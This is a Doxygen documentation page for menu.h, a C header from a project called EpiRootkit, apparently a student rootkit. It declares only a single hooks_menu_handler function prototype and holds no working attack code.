EpiRootkit
By STDBOOL
Loading...
Searching...
No Matches
menu.h
Go to the documentation of this file.
1
// interceptor/core/menu.h
2
#ifndef HOOKS_MENU_H
3
#define HOOKS_MENU_H
4
5
#include "
config.h
"
6
14
int
hooks_menu_handler
(
char
*args,
enum
Protocol
protocol);
15
16
#endif
// HOOKS_MENU_H
config.h
Protocol
Protocol
Definition
config.h:28
hooks_menu_handler
int hooks_menu_handler(char *args, enum Protocol protocol)
Definition
menu.c:289